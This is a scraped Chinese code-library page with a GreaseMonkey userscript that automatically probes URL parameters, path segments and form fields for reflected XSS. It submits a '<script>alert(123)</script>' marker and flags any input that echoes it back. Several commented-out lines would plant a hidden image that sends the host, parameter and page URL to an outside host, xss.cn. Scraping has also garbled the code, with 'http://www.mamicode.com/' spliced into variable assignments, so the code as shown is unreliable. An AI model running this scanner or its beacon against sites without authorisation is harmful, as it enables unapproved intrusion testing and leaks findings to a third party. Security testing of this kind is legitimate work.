首页 > 代码库 > GreaseMonkey开发(二):开发一款自动化检测XSS插件

GreaseMonkey开发(二):开发一款自动化检测XSS插件

引用了black-hole的代码,封装成GreaseMonkey的插件。

  1 // ==UserScript==
  2 // @name        xss
  3 // @namespace   xss
  4 // @version     1
  5 // @grant       none
  6 // ==/UserScript==
  7 
  8 var onlyString ="woainixss<script>alert(123)</script>"; //唯一标识符
  9 var protocol = window.location.protocol;  //网站使用的网络协议(http、https等)
 10 var host = window.location.host;   //网站的主域名(*.com、*.cn等,例:test.cn)
 11 var href = http://www.mamicode.com/window.location.href;   //网站的完整URL(协议+域名+参数+锚)
 12 var hostPath; //用来存放网站除去参数的字符串(协议+域名+锚)
 13 var urlPath;  //用来存放网站URL路径的数组(例:test.cn/test/xss/123  urlPath = [‘test‘,‘xss’,‘123‘])
 14 
 15 if(href.indexOf("?") != "-1"){  //如果url存在?字符串(存在?基本就存在参数了)
 16     hostPath = href.slice(0,href.indexOf("?"));      //去除参数,只留下“协议+域名+锚”
 17 }else{
 18     hostPath = href;  //不存在?则把完整的url赋值给hostPath。
 19 }
 20 urlPath = hostPath.split("/").splice(3);      //以“/”为分隔符,把路径分割成数组。
 21 //alert("hostPath:"+hostPath+"   "+"urlPath:"+urlPath);
 22 
 23 if(location.search != ""){  //当参数不为空时,跳转到parameter_Xss函数里
 24     //alert("parameter_Xss");
 25     parameter_Xss();
 26 }
 27 if(href.split("/")[3] != ""){      //当完整的URL里第三个/后存在字符串,则跳转到pseudoStatic_Xss函数里
 28     //alert("pseudoStatic_Xss");
 29     pseudoStatic_Xss();
 30 }
 31 if($("form").length > 0){       //当页面存在form表单,就跳转到form_Xss函数里
 32     form_Xss();
 33 }
 34 
 35 
 36 function parameter_Xss(){
 37    // alert("parameter_Xss start");
 38     var i; //for循环里的i
 39     var parameter = location.search.substring(1).split("&");    //把URL字符以&分割成字符串
 40     var url = protocol + "//" + host + "/" + urlPath.join("/") + "?";     //拼接成新的URL字符。(例:http://test.cn/test/xss/123?)
 41     for(i = 0;i < parameter.length;i++){      //for循环,有多少个参数就循环多少次
 42         var parameterData =http://www.mamicode.com/ parameter[i];
 43         parameter[i] = parameter[i].split("=")[0] + "=" + parameter[i].split("=")[1] + onlyString;
 44         //alert(url+parameter.join("&"));
 45         $.ajax({
 46              url: url+parameter.join("&"),
 47              type: ‘get‘,
 48              dataType: ‘text‘,
 49              async:false,
 50              success:function(data){
 51                 // alert("+++++++++++++++++++++++++++");
 52                  if(data.indexOf(parameter[i].split("=")[1]) != "-1"){
 53                      alert(parameter[i]);
 54                      //   $("body").append("<img src=http://www.mamicode.com/‘http://xss.cn/getXSS.html?host=$" + host + "&$xss=$" + parameter[i].split("=")[0] + "&$url=$" + window.location.href + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>");
 55                  }
 56              },
 57              error:function(){
 58                       alert("error");
 59                       }
 60        })
 61         parameter[i] = parameterData;
 62     }
 63    // alert("parameter_Xss over");
 64 }
 65 
 66 function pseudoStatic_Xss(){    //伪静态检测XSS
 67    // alert("pseudoStatic_Xss start");
 68     var fileURL;
 69     var fileUrlXss;
 70     var url;
 71     var xss = "";
 72     if(urlPath[urlPath.length-1].indexOf(".") != "-1"){
 73         fileURL = urlPath.pop();
 74         fileUrlXss = fileURL.split(".")[0] + onlyString + "." + fileURL.split(".")[1]
 75         $.ajax({
 76             url: protocol + "//" + host + "/" + urlPath.join("/") + "/" + fileUrlXss,
 77             type: ‘get‘,
 78             dataType: ‘text‘,
 79             async:false,
 80             success:function(data){
 81                // alert("===================================");
 82                 if(data.indexOf(fileUrlXss) != "-1"){
 83                     xss += fileURL + "|";
 84                     //   $("body").append("<img src=http://www.mamicode.com/‘http://xss.cn/getXSS.html?host=$" + host + "&$xss=$" + parameter[i].split("=")[0] + "&$url=$" + window.location.href + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>");
 85                 }
 86             },
 87              error:function(){
 88                      // alert("error");
 89                       }
 90         })
 91     }else{
 92         fileURL = "";
 93         console.log(urlPath)
 94         if(urlPath[urlPath.length-1] == ""){
 95             urlPath.pop();
 96         }
 97     }
 98     for(var i = 0;i < urlPath.length;i++){
 99         urlPath[i] += onlyString;
100         url = protocol + "//" + host + "/" + urlPath.join("/") + "/" + fileURL;
101         $.ajax({
102             url: url,
103             type: ‘post‘,
104             dataType: ‘text‘,
105             async:false,
106             success:function(data){
107                 // alert("===================================");
108                 if(data.indexOf(urlPath[i]) != "-1"){
109                     xss += urlPath[i].substring(0,urlPath[i].length-11) + "|";
110                     //   $("body").append("<img src=http://www.mamicode.com/‘http://xss.cn/getXSS.html?host=$" + host + "&$xss=$" + parameter[i].split("=")[0] + "&$url=$" + window.location.href + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>");
111                 }
112             },
113             error:function(){
114                // alert("error");
115             }           
116         })
117         urlPath[i] = urlPath[i].substring(0,urlPath[i].length-11);
118     }
119     if(xss == ""){
120         return false;
121     }else{
122         xss = xss.substring(0,xss.length-1);
123         alert("当前伪静态路径或者文件" + xss + "存在XSS漏洞");
124         //$("body").append("<img src=http://www.mamicode.com/‘http://xss.cn/getXSS.html?host=$" + host + "&$xss=$" + xss + "&$url=$" + window.location.href + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>");
125     }
126    // alert("pseudoStatic_Xss over");
127 }
128 
129 function form_Xss(){    //form表单检测XSS
130    // alert("form_Xss start");
131     var tureForm;
132     var tureInput;
133     var formImg;
134     var actionUrl;
135     var methodType;
136     var sendDatahttp://www.mamicode.com/= "";
137     var sendDataUrl;
138     var i;
139     var j;
140     tureForm = $("form").filter(function(item,index){
141         var imgArray = [];
142         $(index).find("img").map(function(number,imgSrc){
143             imgArray.push($(imgSrc).attr("src"));
144         });
145         if(imgArray.length > 0){
146             for(i = 0;i < imgArray.length;i++){
147                 if(imgArray[i].indexOf("?") != "-1"){
148                     imgArray[i] = imgArray[i].slice(0,imgArray[i].indexOf("?"));
149                 }
150                 imgArray[i] = imgArray[i].substr(imgArray[i].lastIndexOf("."),imgArray[i].length);
151                 if((imgArray[i] != ".png")&&(imgArray[i] != ".jpg")&&(imgArray[i] != ".jpeg")&&(imgArray[i] != ".gif")){
152                     return false;
153                 }else{
154                     return ($(index).find(":input:not(:submit)").length > 0);
155                 }
156             }
157         }else{
158             return ($(index).find(":input:not(:submit)").length > 0);
159         }
160     })
161     if(tureForm.length <= 0){
162         return false;
163     }
164     tureForm = $(tureForm).filter(function(item,index){
165         var inputName = $(index).find(":input:not(:submit)");
166         for(i = 0;i < inputName.length;i++){
167                 return (inputName[i].getAttribute("name"));
168         }
169     })
170     if(tureForm.length <= 0){
171         return false;
172     }
173     for(i = 0;i < tureForm.length;i++){
174         actionUrl = $(tureForm[i]).attr("action");
175         methodType = $(tureForm[i]).attr("method");
176         if(actionUrl == undefined || actionUrl == "#" || actionUrl == ""){
177             actionUrl = href;
178         }
179         if(methodType == undefined || methodType == "#"){
180             methodType = "get";
181         }
182         tureInput = $(tureForm[i]).find("input:not(:submit)").length
183         for(j = 0;j < tureInput;j++){
184             sendData += $(tureForm[i]).find("input:not(:submit)")[j].getAttribute("name") + "=" + onlyString + j + "&";
185         }
186         sendDataUrl = sendData.substring(0,sendData.length-1);
187         $.ajax({
188             url: actionUrl,
189             type: methodType,
190             dataType: ‘text‘,
191             data: sendDataUrl,
192             async:false,
193             success:function(data){
194                // alert("**************************************");
195                 var xss = "";
196                 for(j = 0;j < tureInput;j++){
197                     if(data.indexOf(onlyString + j) != "-1"){
198                         xss += j + 1 + "|";
199                     }
200                 }
201                 if(xss == ""){
202                     return false;
203                 }else{
204                     xss = xss.substring(0,xss.length-1);
205                     // alert("当前页面action为" + actionUrl + "的form表单第" + xss + "个input存在XSS漏洞");
206                     $(tureForm[i]).find("input").eq(xss - 1).css("border"," 3px solid red")
207                         .val("此输入框存在XSS    ");
208                     // $("body").append("<img src=http://www.mamicode.com/‘http://xss.cn/formXSS.html?host=$" + href + "&$xss=$" + xss + "&$url=$" +actionUrl + "&$rand=$" + Date.parse(new Date()) + "‘ style=‘display:none;‘>");
209                 }
210             },
211             error:function(){
212               //  alert("error");
213             }  
214         })
215     }
216    // alert("form_Xss over");
217 }

 

GreaseMonkey开发(二):开发一款自动化检测XSS插件